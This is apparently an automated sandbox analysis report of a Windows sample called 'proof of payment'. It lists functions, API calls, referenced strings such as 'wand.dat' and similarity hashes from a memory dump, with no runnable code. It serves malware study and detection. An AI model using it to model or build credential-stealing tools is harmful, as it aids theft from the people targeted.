                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ChildEnumTextWindowWindowsmemset
                                      • String ID: caption
                                      • API String ID: 1523050162-4135340389
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                      • String ID: MS Sans Serif
                                      • API String ID: 210187428-168460110
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ClassName_wcsicmpmemset
                                      • String ID: edit
                                      • API String ID: 2747424523-2167791130
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID: SHAutoComplete$shlwapi.dll
                                      • API String ID: 3150196962-1506664499
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp
                                      • String ID:
                                      • API String ID: 3384217055-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$memcpy
                                      • String ID:
                                      • API String ID: 368790112-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                      • GetMenu.USER32(?), ref: 00410F8D
                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                      • String ID:
                                      • API String ID: 1889144086-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                      • memcpy.MSVCRT ref: 0042EC7A
                                      Strings
                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                      • API String ID: 1297977491-2063813899
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0040560C
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.*$dat$wand.dat
                                      • API String ID: 2618321458-1828844352
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                      • wcslen.MSVCRT ref: 00410C74
                                      • _wtoi.MSVCRT ref: 00410C80
                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                      • String ID:
                                      • API String ID: 1549203181-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00412057
                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                      • String ID:
                                      • API String ID: 3550944819-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                      • memcpy.MSVCRT ref: 0040A94F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 3023356884-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • wcslen.MSVCRT ref: 0040B1DE
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                      • memcpy.MSVCRT ref: 0040B248
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 3023356884-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: @
                                      • API String ID: 3510742995-2766056989
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • strlen.MSVCRT ref: 0040B0D8
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                      • memcpy.MSVCRT ref: 0040B159
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocstrlen
                                      • String ID:
                                      • API String ID: 1171893557-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 004144E7
                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                        • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                      • memset.MSVCRT ref: 0041451A
                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                      • String ID:
                                      • API String ID: 1127616056-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                      • wcscpy.MSVCRT ref: 00414DF3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                      • String ID:
                                      • API String ID: 3917621476-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76F8DF80,?,0041755F,?), ref: 00417452
                                      • malloc.MSVCRT ref: 00417459
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,76F8DF80,?,0041755F,?), ref: 00417478
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$??3@malloc
                                      • String ID:
                                      • API String ID: 4284152360-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                      • RegisterClassW.USER32(?), ref: 00412428
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                      • String ID:
                                      • API String ID: 2678498856-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item
                                      • String ID:
                                      • API String ID: 3888421826-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00417B7B
                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                      • GetLastError.KERNEL32 ref: 00417BB5
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockUnlockmemset
                                      • String ID:
                                      • API String ID: 3727323765-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                      • malloc.MSVCRT ref: 00417407
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$??3@malloc
                                      • String ID:
                                      • API String ID: 4284152360-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0040F673
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                      • strlen.MSVCRT ref: 0040F6A2
                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0040F6E2
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                      • strlen.MSVCRT ref: 0040F70D
                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                      • String ID:
                                      • API String ID: 764393265-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Time$System$File$LocalSpecific
                                      • String ID:
                                      • API String ID: 979780441-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memcpy.MSVCRT ref: 004134E0
                                      • memcpy.MSVCRT ref: 004134F2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$DialogHandleModuleParam
                                      • String ID:
                                      • API String ID: 1386444988-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: InvalidateMessageRectSend
                                      • String ID: d=E
                                      • API String ID: 909852535-3703654223
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • wcschr.MSVCRT ref: 0040F79E
                                      • wcschr.MSVCRT ref: 0040F7AC
                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcschr$memcpywcslen
                                      • String ID: "
                                      • API String ID: 1983396471-123907689
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemcpy
                                      • String ID: %2.2X
                                      • API String ID: 2789212964-323797159
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _snwprintf
                                      • String ID: %%-%d.%ds
                                      • API String ID: 3988819677-2008345750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0040E770
                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: MessageSendmemset
                                      • String ID: F^@
                                      • API String ID: 568519121-3652327722
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PlacementWindowmemset
                                      • String ID: WinPos
                                      • API String ID: 4036792311-2823255486
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                      • wcscat.MSVCRT ref: 0040DCFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileModuleNamewcscatwcsrchr
                                      • String ID: _lng.ini
                                      • API String ID: 383090722-1948609170
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                      • API String ID: 2773794195-880857682
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID:
                                      • API String ID: 438689982-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??2@$memset
                                      • String ID:
                                      • API String ID: 1860491036-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memcmp.MSVCRT ref: 00408AF3
                                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                        • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                      • memcmp.MSVCRT ref: 00408B2B
                                      • memcmp.MSVCRT ref: 00408B5C
                                      • memcpy.MSVCRT ref: 00408B79
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcmp$memcpy
                                      • String ID:
                                      • API String ID: 231171946-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: wcslen$wcscat$wcscpy
                                      • String ID:
                                      • API String ID: 1961120804-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%